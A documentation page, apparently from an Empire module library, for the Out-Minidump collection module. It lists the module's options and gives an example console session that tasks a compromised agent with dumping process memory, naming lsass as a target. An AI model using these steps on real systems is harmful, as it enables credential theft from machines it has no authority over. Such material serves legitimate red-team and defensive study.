Out-Minidump - Empire Module


This page contains detailed information about how to use the powershell/collection/minidump Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Out-Minidump
Module: powershell/collection/minidump
Source code [1]: empire/server/modules/powershell/collection/minidump.yaml
Source code [2]: empire/server/modules/powershell/collection/minidump.py
MITRE ATT&CK: T1033
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes

The minidump module generates a full-memory dump of a process. Note: To dump another user's process, you must be running from an elevated prompt (e.g to dump lsass).

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the minidump module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the minidump module:

Agent
Agent to run module on.

Additional Module Options


This is a list of additional options that are supported by the minidump module:

DumpFilePath
Specifies the folder path where dump files will be written. Defaults to the current user directory.

ProcessId
Specifies the process ID for which a dump will be generated.

ProcessName
Specifies the process name for which a dump will be generated.

Minidump Example Usage


Here's an example of how to use the minidump module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/minidump

 Author       @mattifestation                                                        
 Background   True                                                                   
 Comments     https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration 
              /Out-Minidump.ps1                                                      
 Description  Generates a full-memory dump of a process. Note: To dump another       
              user's process, you must be running from an elevated prompt (e.g to    
              dump lsass)                                                            
 Language     powershell                                                             
 Name         powershell/collection/minidump                                         
 NeedsAdmin   False                                                                  
 OpsecSafe    False                                                                  
 Techniques   http://attack.mitre.org/techniques/T1033                               


,Record Optionsw-------,----------,------------------------------------,
| Name         | Value | Required | Description                        |
|--------------|-------|----------|------------------------------------|
| Agent        |       | True     | Agent to run module on.            |
|--------------|-------|----------|------------------------------------|
| DumpFilePath |       | False    | Specifies the folder path where    |
|              |       |          | dump files will be written.        |
|              |       |          | Defaults to the current user       |
|              |       |          | directory.                         |
|--------------|-------|----------|------------------------------------|
| ProcessId    |       | False    | Specifies the process ID for which |
|              |       |          | a dump will be generated.          |
|--------------|-------|----------|------------------------------------|
| ProcessName  |       | False    | Specifies the process name for     |
|              |       |          | which a dump will be generated.    |
'--------------'-------'----------'------------------------------------'

(Empire: usemodule/powershell/collection/minidump) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/minidump) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.